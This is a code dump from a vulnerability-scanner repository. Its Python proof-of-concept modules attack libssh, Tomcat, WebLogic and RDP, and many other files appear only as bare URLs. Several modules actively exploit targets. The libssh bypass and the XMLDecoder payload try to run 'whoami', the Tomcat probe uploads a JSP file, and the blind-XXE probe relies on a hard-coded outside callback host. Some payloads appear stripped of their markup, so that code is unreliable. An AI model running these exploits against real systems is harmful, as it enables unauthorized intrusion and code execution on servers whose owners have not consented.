--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/ssh/__init__.py


--------------------------------------------------------------------------------
/POC_Scan/system/ssh/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/ssh/__pycache__/__init__.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/ssh/__pycache__/__init__.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/ssh/__pycache__/__init__.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/ssh/__pycache__/libssh_bypass_auth.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/ssh/__pycache__/libssh_bypass_auth.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/ssh/__pycache__/libssh_bypass_auth.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/ssh/__pycache__/libssh_bypass_auth.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/ssh/libssh_bypass_auth.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: libssh身份绕过漏洞(CVE-2018-10933)
 5 | referer: https://www.anquanke.com/post/id/162225
 6 | author: from https://github.com/blacknbunny/libSSH-Authentication-Bypass
 7 | env source:https://github.com/vulhub/vulhub/blob/master/libssh/CVE-2018-10933/README.zh-cn.md
 8 | description: 漏洞源于未经过验证的session操纵SSH2_MSG_USERAUTH_SUCCESS导致的身份验证绕过。
 9 | '''
10 | import sys
11 | import socket
12 | import paramiko
13 | import warnings
14 | import tempfile,sys
15 | from termcolor import cprint
16 | from urllib.parse import urlparse
17 | 
# Import-time side effect: from here on every write to stderr in this process
# lands in an anonymous temporary file instead of the terminal. Because this
# module is imported by systemmain.py, the redirect applies to whatever imports
# that module as well, so tracebacks and library warnings from unrelated code
# are silently lost. NOTE(review): a narrower fix (e.g. a filter on the
# paramiko logger) would avoid hiding errors process-wide.
sys.stderr=tempfile.TemporaryFile()
19 | 
class libssh_bypass_auth_BaseVerify:
    """Probe for the libssh authentication-bypass issue named in the module header.

    run() derives host/port from ``url``, opens a paramiko transport, sends a
    USERAUTH_SUCCESS message without authenticating and then tries to run
    ``whoami`` in a session; a zero exit status is reported as vulnerable.
    This is an active check: on an affected server it executes a command,
    so it will appear in the target's SSH/audit logs.
    """
    def __init__(self, url):
        # Target as given by the caller: a URL or "host[:port]".
        self.url = url

    def run(self):
        """Run the probe. Returns True when vulnerable, otherwise None."""
        port = 22
        # Substring test: any target string containing "http" takes the URL
        # branch, including a bare hostname such as "httpd.example" (constructed).
        if r"http" in self.url:
            # extract the host part
            host = urlparse(self.url)[1]  # netloc, may still carry ":port"
            try:
                port = int(host.split(':')[1])
            except:
                # No explicit port, or a non-numeric one: keep the default 22.
                # NOTE(review): a bare except also swallows KeyboardInterrupt.
                pass
            flag = host.find(":")
            if flag != -1:
                host = host[:flag]
        else:
            if self.url.find(":") >= 0:
                host = self.url.split(":")[0]
                # Raises ValueError (uncaught here) if the port is not numeric.
                port = int(self.url.split(":")[1])
            else:
                host = self.url

        try:
            sock = socket.socket()
            sock.settimeout(6)
            sock.connect((host, port))
            message = paramiko.message.Message()
            transport = paramiko.transport.Transport(sock)
            transport.start_client()
            # _send_message is a private paramiko API; it may change between
            # paramiko releases.
            message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
            transport._send_message(message)
            # Banner is printed for every reachable server, vulnerable or not.
            cprint("[*]发现"+host+":"+str(port)+" 版本:"+transport.remote_version, "green")
            spawncmd = transport.open_session(timeout=6)
            spawncmd.exec_command("whoami")
            if spawncmd.recv_exit_status() == 0:
                cprint("[+]存在libssh身份绕过漏洞...(高危)\tpayload: "+host+":"+str(port), "red")
                return True
            else:
                cprint("[-]不存在libssh_bypass_auth漏洞", "white", "on_grey")

        except:
            # Any failure (connect timeout, transport/banner error, session
            # refused) is reported as "probably not vulnerable". Neither the
            # socket nor the transport is closed explicitly on any path.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
63 | 
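if __name__ == "__main__":
    # Standalone entry point: the target (host[:port] or URL) is the first CLI
    # argument. Exit with a usage line instead of an IndexError traceback
    # when it is missing.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <host[:port] | url>")
    warnings.filterwarnings("ignore")
    libssh_bypass_auth_BaseVerify(sys.argv[1]).run()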
68 | 


--------------------------------------------------------------------------------
/POC_Scan/system/systemmain.py:
--------------------------------------------------------------------------------
 1 | #ssh漏洞
 2 | from POC_Scan.system.ssh.libssh_bypass_auth import libssh_bypass_auth_BaseVerify
 3 | 
 4 | #tomcat vulns
 5 | from POC_Scan.system.tomcat.tomcat_put_exec import tomcat_put_exec_BaseVerify
 6 | from POC_Scan.system.tomcat.tomcat_Ajp_lfi import tomcat_Ajp_lfi_BaseVerify
 7 | 
 8 | #nginx vulns
 9 | from POC_Scan.system.nginx.multi_fastcgi_code_exec import multi_fastcgi_code_exec_BaseVerify
10 | 
11 | #weblogic vulns
12 | from POC_Scan.system.weblogic.weblogic_ssrf import weblogic_ssrf_BaseVerify
13 | from POC_Scan.system.weblogic.weblogic_xmldecoder_exec import weblogic_xmldecoder_exec_BaseVerify
14 | from POC_Scan.system.weblogic.weblogic_interface_disclosure import weblogic_interface_disclosure_BaseVerify
15 | from POC_Scan.system.weblogic.weblogic_ws_utc_xxe import weblogic_ws_utc_xxe_BaseVerify
16 | 
17 | #php vulns
18 | from POC_Scan.system.php.php_expose_disclosure import php_expose_disclosure_BaseVerify
19 | from POC_Scan.system.php.php_fastcgi_read import php_fastcgi_read_BaseVerify
20 | 
21 | #iis vulns
22 | from POC_Scan.system.iis.iis_webdav_rce import iis_webdav_rce_BaseVerify
23 | 
24 | #windows
25 | from POC_Scan.system.windows.RDP_CodeExecution import rdp_code_execution_BaseVerify
26 | from POC_Scan.system.windows.smb_code_execution import smb_code_execution_BaseVerify
27 | 


--------------------------------------------------------------------------------
/POC_Scan/system/tomcat/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/tomcat/__init__.py


--------------------------------------------------------------------------------
/POC_Scan/system/tomcat/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/tomcat/__pycache__/__init__.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/tomcat/__pycache__/__init__.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/tomcat/__pycache__/__init__.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/tomcat/__pycache__/tomcat_Ajp_lfi.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/tomcat/__pycache__/tomcat_Ajp_lfi.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/tomcat/__pycache__/tomcat_Ajp_lfi.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/tomcat/__pycache__/tomcat_Ajp_lfi.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/tomcat/__pycache__/tomcat_put_exec.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/tomcat/__pycache__/tomcat_put_exec.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/tomcat/__pycache__/tomcat_put_exec.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/tomcat/__pycache__/tomcat_put_exec.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/tomcat/__pycache__/tomcat_weak_pass.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/tomcat/__pycache__/tomcat_weak_pass.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/tomcat/tomcat_put_exec.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: Tomcat代码执行漏洞(CVE-2017-12616)
 5 | referer: https://mp.weixin.qq.com/s/dgWT3Cgf1mQs-IYxeID_Mw
 6 | author: Lucifer
 7 | description: 当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行。
 8 | 影响版本:Apache Tomcat 7.0.0 - 7.0.79(7.0.81修复不完全)。
 9 | '''
10 | import sys
11 | import time
12 | import hashlib
13 | import requests
14 | import datetime
15 | import warnings
16 | from termcolor import cprint
17 | 
class tomcat_put_exec_BaseVerify:
    """Probe for the Tomcat PUT-upload issue named in the module header.

    run() issues two HTTP PUT requests carrying the marker body
    ``thisisashell``, first to ``<url>/<digest>.jsp::$DATA`` and then to
    ``<url>/<digest>.jsp/``; an HTTP 201 on either is reported as vulnerable.
    Note for operators: on an affected host the PUT creates a ``.jsp`` file
    and nothing in this class deletes it again (no DELETE request is sent),
    so clean-up has to be done by hand.
    """
    def __init__(self, url):
        # Base URL of the target; the probe paths are appended in run().
        self.url = url

    def run(self):
        """Run both PUT variants. Returns True on the first 201, otherwise None."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        # Marker content only; the probe checks the status code, not the body.
        post_data = "thisisashell"
        # File name = md5 of the current time at one-second resolution
        # (timetuple() drops microseconds), so both attempts below get the
        # same name when they run within the same second.
        time_stamp = time.mktime(datetime.datetime.now().timetuple())
        m = hashlib.md5(str(time_stamp).encode(encoding='utf-8'))
        md5_str = m.hexdigest()
        # Variant 1: NTFS alternate-data-stream suffix.
        vulnurl = self.url + "/" + md5_str +".jsp::$DATA"
        try:
            req = requests.put(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            if req.status_code == 201:
                cprint("[+]存在Tomcat代码执行漏洞...(高危)\tpayload: "+vulnurl+"\tshellpath: "+self.url+"/"+md5_str+".jsp", "red")
                return True
            else:
                cprint("[-]不存在tomcat_put_exec漏洞", "white", "on_grey")

        except:
            # Transport failure on variant 1 is reported and variant 2 still runs.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")

        # Variant 2: trailing slash. Same request otherwise (the code below
        # duplicates the block above).
        time_stamp = time.mktime(datetime.datetime.now().timetuple())
        m = hashlib.md5(str(time_stamp).encode(encoding='utf-8'))
        md5_str = m.hexdigest()
        vulnurl = self.url + "/" + md5_str +".jsp/"
        try:
            req = requests.put(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            if req.status_code == 201:
                cprint("[+]存在Tomcat代码执行漏洞...(高危)\tpayload: "+vulnurl+"\tshellpath: "+self.url+"/"+md5_str+".jsp", "red")
                return True
            else:
                cprint("[-]不存在tomcat_put_exec漏洞", "white", "on_grey")

        except:
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
56 | 
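if __name__ == "__main__":
    # Standalone entry point: the base URL is the first CLI argument. Exit
    # with a usage line instead of an IndexError traceback when it is missing.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base_url>")
    warnings.filterwarnings("ignore")
    tomcat_put_exec_BaseVerify(sys.argv[1]).run()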
61 | 


--------------------------------------------------------------------------------
/POC_Scan/system/weblogic/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/weblogic/__init__.py


--------------------------------------------------------------------------------
/POC_Scan/system/weblogic/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/weblogic/__pycache__/__init__.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/weblogic/__pycache__/__init__.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/weblogic/__pycache__/__init__.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/weblogic/__pycache__/weblogic_interface_disclosure.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/weblogic/__pycache__/weblogic_interface_disclosure.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/weblogic/__pycache__/weblogic_interface_disclosure.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/weblogic/__pycache__/weblogic_interface_disclosure.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/weblogic/__pycache__/weblogic_ssrf.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/weblogic/__pycache__/weblogic_ssrf.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/weblogic/__pycache__/weblogic_ssrf.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/weblogic/__pycache__/weblogic_ssrf.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/weblogic/__pycache__/weblogic_weak_pass.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/weblogic/__pycache__/weblogic_weak_pass.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/weblogic/__pycache__/weblogic_ws_utc_xxe.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/weblogic/__pycache__/weblogic_ws_utc_xxe.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/weblogic/__pycache__/weblogic_ws_utc_xxe.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/weblogic/__pycache__/weblogic_ws_utc_xxe.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/weblogic/__pycache__/weblogic_xmldecoder_exec.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/weblogic/__pycache__/weblogic_xmldecoder_exec.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/weblogic/__pycache__/weblogic_xmldecoder_exec.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/weblogic/__pycache__/weblogic_xmldecoder_exec.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/weblogic/weblogic_interface_disclosure.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: weblogic 接口泄露
 5 | referer: unknown
 6 | author: Lucifer
 7 | description: weblogic 接口泄露
 8 | '''
 9 | import sys
10 | import warnings
11 | import requests
12 | from termcolor import cprint
13 | 
class weblogic_interface_disclosure_BaseVerify:
    """Check whether WebLogic's internal deployment-service endpoint is exposed.

    One GET (redirects not followed) is sent to
    ``/bea_wls_deployment_internal/DeploymentService`` under the target URL;
    an HTTP 200 reply is reported as an information-disclosure finding. The
    request carries no body and changes nothing on the target.
    """

    def __init__(self, url):
        # Base URL (scheme://host[:port]); the endpoint path is appended in run().
        self.url = url

    def run(self):
        """Send the probe. Returns True on a 200 reply, otherwise None."""
        endpoint = "/bea_wls_deployment_internal/DeploymentService"
        probe_url = "".join((self.url, endpoint))
        request_headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        try:
            # verify=False matches the other probes in this tree: the scanner
            # deliberately does not validate the target's TLS certificate.
            response = requests.get(
                probe_url,
                headers=request_headers,
                timeout=10,
                verify=False,
                allow_redirects=False,
            )
            if response.status_code != 200:
                cprint("[-]不存在weblogic_interface_disclosure漏洞", "white", "on_grey")
            else:
                cprint("[+]存在weblogic 接口泄露漏洞...(信息)\tpayload: "+probe_url, "green")
                return True
        except:
            # Broad on purpose: any transport-level failure is reported as
            # "probably not vulnerable" rather than aborting the scan.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
35 | 
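if __name__ == "__main__":
    # Standalone entry point: the base URL is the first CLI argument. Exit
    # with a usage line instead of an IndexError traceback when it is missing.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base_url>")
    warnings.filterwarnings("ignore")
    weblogic_interface_disclosure_BaseVerify(sys.argv[1]).run()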
40 | 


--------------------------------------------------------------------------------
/POC_Scan/system/weblogic/weblogic_ssrf.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: weblogic SSRF漏洞(CVE-2014-4210)
 5 | referer: http://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html
 6 | author: Lucifer
 7 | description: weblogic 版本10.0.2 -- 10.3.6中SearchPublicRegistries.jsp,参数operator可传入内网IP造成SSRF漏洞
 8 | '''
 9 | import sys
10 | import warnings
11 | import requests
12 | from termcolor import cprint
13 | 
class weblogic_ssrf_BaseVerify:
    """Probe for the WebLogic SSRF issue named in the module header.

    run() requests ``SearchPublicRegistries.jsp`` with ``operator`` pointing
    at ``http://localhost/robots.txt`` on the target itself and inspects the
    response text for two markers. The target is only asked to fetch a URL
    on its own loopback interface; nothing else is sent or changed.
    """
    def __init__(self, url):
        # Base URL of the target; the probe path is appended in run().
        self.url = url

    def run(self):
        """Send the probe. Returns True when the markers match, otherwise None."""
        headers = {
        "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://localhost/robots.txt&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search"
        vulnurl = self.url + payload
        try:
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)

            # Vulnerable = the SOAP exception marker is present but the
            # "IO Exception on sendMessage" marker is absent; presumably the
            # former means the server fetched the operator URL and got a
            # non-SOAP reply, while the latter would mean it could not connect.
            # Both markers come from the reference writeup and are plain
            # substring checks on the full page body.
            if r"weblogic.uddi.client.structures.exception.XML_SoapException" in req.text and r"IO Exception on sendMessage" not in req.text:
                cprint("[+]存在weblogic SSRF漏洞...(中危)\tpayload: "+vulnurl, "yellow")
                return True
            else:
                cprint("[-]不存在weblogic_ssrf漏洞", "white", "on_grey")

        except:
            # Any transport failure is reported as "probably not vulnerable".
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
35 | 
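if __name__ == "__main__":
    # Standalone entry point: the base URL is the first CLI argument. Exit
    # with a usage line instead of an IndexError traceback when it is missing.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base_url>")
    warnings.filterwarnings("ignore")
    weblogic_ssrf_BaseVerify(sys.argv[1]).run()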
40 | 


--------------------------------------------------------------------------------
/POC_Scan/system/weblogic/weblogic_ws_utc_xxe.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: weblogic blind XXE漏洞(CVE-2018-3246)
 5 | referer: http://www.freebuf.com/vuls/186862.html
 6 | author: Lucifer
 7 | description: blind XXE。
 8 | '''
 9 | import sys
10 | import time
11 | import json
12 | import hashlib
13 | import datetime
14 | import warnings
15 | import requests
16 | from termcolor import cprint
17 | 
class weblogic_ws_utc_xxe_BaseVerify:
    """Probe for the blind-XXE issue named in the module header.

    run() uploads a small multipart body to ``/ws_utc/resources/ws/config/import``
    on the target, waits six seconds, then fetches a log page from a
    hard-coded *third-party* host (``45.76.158.91``) and looks for the
    per-run md5 marker there. Two consequences for anyone running this:
    the verdict depends entirely on a server the operator does not control,
    and a positive hit means the target has contacted that server.
    """
    def __init__(self, url):
        # Base URL of the target; the probe path is appended in run().
        self.url = url

    def run(self):
        """Send the probe and poll the callback log. Returns True on a hit, otherwise None."""
        headers = {
            "Content-Type":"multipart/form-data; boundary=----WebKitFormBoundaryUFcVz4AB2dQvWbyH",
            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
            }
        payload = "/ws_utc/resources/ws/config/import?timestamp=123123"
        vulnurl = self.url + payload
        # Per-run marker: md5 of the current time at one-second resolution.
        time_stamp = time.mktime(datetime.datetime.now().timetuple())
        m = hashlib.md5(str(time_stamp).encode(encoding='utf-8'))
        md5_str = m.hexdigest()
        # NOTE(review): as it appears in this copy the XML part of the body is
        # just "%remote;]>" and md5_str is never inserted into it, so the
        # `md5_str in reqr.text` check below cannot succeed; the DOCTYPE/entity
        # markup was probably lost when the file was rendered. Verify against
        # the original source before relying on this probe.
        post_data = "------WebKitFormBoundaryUFcVz4AB2dQvWbyH\r\nContent-Disposition: form-data; name=\"import_file_name\"; filename=\"1.xml\"\r\nContent-Type: text/xml\r\n\r\n%remote;]>\n\r\n------WebKitFormBoundaryUFcVz4AB2dQvWbyH--\r\n"
        try:
            # The upload's own response is not inspected (req is unused).
            req = requests.post(vulnurl, headers=headers, data=post_data, timeout=10, verify=False)
            # Callback log on an external host; reused multipart headers are
            # harmless for a GET but are not needed here.
            eye_url = "http://45.76.158.91/web.log"
            time.sleep(6)  # fixed wait for the out-of-band callback, per target
            reqr = requests.get(eye_url, headers=headers, timeout=10, verify=False)
            if md5_str in reqr.text:
                cprint("[+]存在weblogic blind XXE漏洞(CVE-2018-3246)...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
                return True
            else:
                cprint("[-]不存在weblogic_ws_utc_xxe漏洞", "white", "on_grey")

        except:
            # Failure of either request (target or callback host) ends up here.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
46 | 
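if __name__ == "__main__":
    # Standalone entry point: the base URL is the first CLI argument. Exit
    # with a usage line instead of an IndexError traceback when it is missing.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base_url>")
    warnings.filterwarnings("ignore")
    weblogic_ws_utc_xxe_BaseVerify(sys.argv[1]).run()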


--------------------------------------------------------------------------------
/POC_Scan/system/weblogic/weblogic_xmldecoder_exec.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: weblogic XMLdecoder反序列化漏洞(CVE-2017-10271)
 5 | referer: https://www.anquanke.com/post/id/92003
 6 | author: Lucifer
 7 | description: weblogic /wls-wsat/CoordinatorPortType接口存在命令执行。
 8 | '''
 9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 | 
class weblogic_xmldecoder_exec_BaseVerify:
    """Probe for the WebLogic XMLDecoder deserialization issue named in the module header.

    run() POSTs an XML body to ``/wls-wsat/CoordinatorPortType`` and reports
    vulnerable when the reply is HTTP 500 and mentions
    ``java.lang.ProcessBuilder``. The body asks the server to run
    ``/bin/sh -c whoami``, so this is an active command-execution attempt,
    not a passive version check; expect it in the target's logs.
    """
    def __init__(self, url):
        # Base URL of the target; the probe path is appended in run().
        self.url = url

    def run(self):
        """Send the probe. Returns True when the 500/ProcessBuilder markers match, otherwise None."""
        headers = {
            "Content-Type":"text/xml;charset=UTF-8",
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/wls-wsat/CoordinatorPortType"
        # NOTE(review): in this copy only the text nodes ("/bin/sh", "-c",
        # "whoami") survive and the surrounding SOAP/XMLDecoder markup is
        # missing, most likely stripped when the file was rendered; as shown
        # the body is whitespace plus three words. Check the original source.
        post_data = '''
         
           
              
               
                 
                   
                     
                      /bin/sh 
                      
                     
                      -c 
                      
                     
                      whoami
                     
                    
                   
                 
               
             
            
           
        
        '''
        vulnurl = self.url + payload
        try:
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            # Both conditions must hold: a 500 alone (e.g. a parse error) is
            # not enough, the error page must also name ProcessBuilder.
            if req.status_code == 500 and r"java.lang.ProcessBuilder" in req.text:
                cprint("[+]存在weblogic XMLdecoder反序列化漏洞...(高危)\tpayload: "+vulnurl, "red")
                return True
            else:
                cprint("[-]不存在weblogic_xmldecoder_exec漏洞", "white", "on_grey")

        except:
            # Any transport failure is reported as "probably not vulnerable".
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
60 | 
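if __name__ == "__main__":
    # Standalone entry point: the base URL is the first CLI argument. Exit
    # with a usage line instead of an IndexError traceback when it is missing.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base_url>")
    warnings.filterwarnings("ignore")
    weblogic_xmldecoder_exec_BaseVerify(sys.argv[1]).run()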
65 | 


--------------------------------------------------------------------------------
/POC_Scan/system/windows/0708detector.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/windows/0708detector.exe


--------------------------------------------------------------------------------
/POC_Scan/system/windows/RDP_CodeExecution.py:
--------------------------------------------------------------------------------
import os
import subprocess
import sys

from termcolor import cprint
 4 | 
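class rdp_code_execution_BaseVerify:
    """Wrapper around the bundled ``0708detector.exe`` RDP checker.

    The detector binary ships next to this module and is run as a child
    process; its combined stdout/stderr is searched for the literal
    ``WARNING: SERVER IS VULNERABLE``. The binary is an opaque dependency
    whose provenance is not documented in this repository, so verify it
    before running it on any host.
    """

    def __init__(self, url):
        # Resolve the detector relative to this file so the cwd does not matter.
        here = os.path.dirname(os.path.abspath(__file__))
        self.poc = os.path.join(here, '0708detector.exe')
        self.url = url

    def run(self, port='3389'):
        """Run the detector against ``self.url``.

        Args:
            port: RDP port passed to the detector's ``-p`` flag (string).

        Returns:
            True when the detector reports the server vulnerable, otherwise None.
        """
        # Argument list instead of a shell string: the target and port come
        # from the caller (CLI / target lists), and a shell string would let
        # metacharacters in them run extra commands on the scanning host.
        command = [self.poc, '-t', str(self.url), '-p', str(port)]
        try:
            proc = subprocess.run(
                command,
                stdout=subprocess.PIPE,
                stderr=subprocess.STDOUT,  # getoutput() merged both streams; keep that
                universal_newlines=True,
            )
            result = proc.stdout or ''
            if 'WARNING: SERVER IS VULNERABLE' in result:
                cprint("[+]存在RDP远程代码执行漏洞", "green")
                return True
            cprint("[-]不存在RDP远程代码执行漏洞", "white", "on_grey")
        except (OSError, subprocess.SubprocessError):
            # Detector missing or not executable on this platform. The old
            # code ran the process outside the try, so these propagated.
            cprint("[-] " + __file__ + "====>可能不存在漏洞", "cyan")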
24 | 
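if __name__ == '__main__':
    # Standalone entry point: host (and optional port) come from the command
    # line. The previous version referenced a misspelled class name, which
    # raised NameError, and scanned a fixed public IP.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <host> [port]")
    rdp = rdp_code_execution_BaseVerify(sys.argv[1])
    rdp.run(sys.argv[2] if len(sys.argv) > 2 else '3389')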
28 | 


--------------------------------------------------------------------------------
/POC_Scan/system/windows/__pycache__/RDP_CodeExecution.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/windows/__pycache__/RDP_CodeExecution.cpython-37.pyc


--------------------------------------------------------------------------------
